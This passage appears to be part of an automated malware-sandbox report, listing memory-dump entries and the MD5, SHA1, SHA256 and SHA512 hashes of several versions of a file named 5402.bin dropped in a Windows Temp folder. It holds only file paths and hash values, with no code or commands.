| SHA512 | a42a33385a796c2a131f3a9a1363897154ff7a8d71a22ce7437ae358b75a5149b1e68a369c87f509cc4f95848adfe8405f5cf6f6fff63d4054c0b7e451829884 |
memory/4344-208-0x0000000000000000-mapping.dmp
memory/2768-209-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | abf64e6496c59529fb810077fd3119ef |
| SHA1 | 98ff44e960386613f7d58562cb5f3290e98e9df1 |
| SHA256 | 794f6c19695cf6d98006039a7a380573a669ee73e270efa0a640d6ca7741c649 |
| SHA512 | d8c1c9a0fc4aee82316a07c92dbb207150b253b56df4c9ee5a4d664fcd0b720a2a242c6d16c3eb114425058d1742bcc40c0df821e571df39e761c33c6ada7ee7 |
memory/3012-211-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | abf64e6496c59529fb810077fd3119ef |
| SHA1 | 98ff44e960386613f7d58562cb5f3290e98e9df1 |
| SHA256 | 794f6c19695cf6d98006039a7a380573a669ee73e270efa0a640d6ca7741c649 |
| SHA512 | d8c1c9a0fc4aee82316a07c92dbb207150b253b56df4c9ee5a4d664fcd0b720a2a242c6d16c3eb114425058d1742bcc40c0df821e571df39e761c33c6ada7ee7 |
memory/3056-213-0x0000000000000000-mapping.dmp
memory/2292-214-0x0000000000000000-mapping.dmp
memory/3404-215-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | 071b54b10c201d9a75dc124bd6b60195 |
| SHA1 | e6490ad03960eff659c650bca6fe09c278bef4c7 |
| SHA256 | e79290c2f7b9c34296a602c45cc68bb680d0a0ae404b3b90ad1f5fe013dc6091 |
| SHA512 | bfd3d967b7ea1a17cf7b79f0192232d9511006d58c6113559884e69d438bb68777ff8105307c997d3055ce815e44857b1c3cf74516f016c917d246e174cb2344 |
memory/4720-217-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | 071b54b10c201d9a75dc124bd6b60195 |
| SHA1 | e6490ad03960eff659c650bca6fe09c278bef4c7 |
| SHA256 | e79290c2f7b9c34296a602c45cc68bb680d0a0ae404b3b90ad1f5fe013dc6091 |
| SHA512 | bfd3d967b7ea1a17cf7b79f0192232d9511006d58c6113559884e69d438bb68777ff8105307c997d3055ce815e44857b1c3cf74516f016c917d246e174cb2344 |
memory/1164-219-0x0000000000000000-mapping.dmp
memory/1824-220-0x0000000000000000-mapping.dmp
memory/3128-221-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | d9b94eb5a102fdae456204a449e973a7 |
| SHA1 | 530974261c01770ad7a39d8ac8151792132ac990 |
| SHA256 | 150a020be080476b8dc73ba9c278041ef0c0371266f47ac2815943cc37917366 |
| SHA512 | e8c548830d9b65a375b7774fda580bb06ae5d2ee4c52b2e87325be78f3de0841a7eda3e0041f2ee0c2af5c029baa2d9b749d35e1b6cba47b0f7db9c85212e77e |
memory/4204-223-0x0000000000000000-mapping.dmp
memory/2548-224-0x0000000000000000-mapping.dmp
memory/908-225-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | cab5b6729b5bb3e8f490f7cb0189e970 |
| SHA1 | 0dd4bcc3ce80531496ff5ea7fcaa6b721bc56a5a |
| SHA256 | e85d44207c226c0ec93c5850f193106b807f0606b963f0eb5758865629c7e930 |
| SHA512 | 8b89cc4a673714131b100bfcb86744d5a8ee7d77b87dee2ddc749e3ff75a71bf0cec4174aec390eacef654b717fffd700d9f588ec0f16c98736fd1cc5a68220e |
memory/4224-227-0x0000000000000000-mapping.dmp
memory/432-228-0x0000000000000000-mapping.dmp
memory/4912-229-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | 3ae9d680b324f08cfe4a590ea56725ac |
| SHA1 | 4a02075d3c583159dcae5ac69849bf274cbf90a1 |
| SHA256 | c6e2595e5f76cbda8e6ebb1c6465779798c792ff906b7c6e6858b8fd3d211724 |
| SHA512 | fc65d1d5ec4e0c5d880f8706db407ae4c0dcd4b8c3a6df0310d1dc90722c767fbabfb175d94a8d2a8814b568a7612090701d5a3a091bc5ce6a97cfc5706a39df |
memory/3856-231-0x0000000000000000-mapping.dmp
memory/4440-232-0x0000000000000000-mapping.dmp
memory/3996-233-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | 5ba94a59c8895f622608e8a6484ba516 |
| SHA1 | aa6b20c18d068c0e2613eff286a5ce5d35a68915 |
| SHA256 | 876085d57159e7f54ed2ea6d01167f94daeb5e90aa07fac151e61b9a0b4ef369 |
| SHA512 | 2a2150b289dc4f6635c13ba9d42842f46292622f673075da6a6aa522223ae55be855dfd1daa354da5202d268e1b5d88c5698c1d4a0b69ad4b9e90db6907be40a |
C:\Users\Admin\AppData\Local\Temp\5402.bin
| MD5 | bb647e73a1544304d7b25bf7fd1cdd01 |
| SHA1 | 6f731fb75acdd35e52de886577ee99fc66db2aff |
| SHA256 | 67498903bfbfa2680b4630741e6ed999639cc2eb253c8b250a07c567b97ec21b |
| SHA512 | 00b5abbd1691c9ddfe60902d7df495ba585a85a8272e4f4eaa0e92d1ebf6007afead623cccd238acf1823fd47ab43ec1d7321d389c58e06d08081985f18e4532 |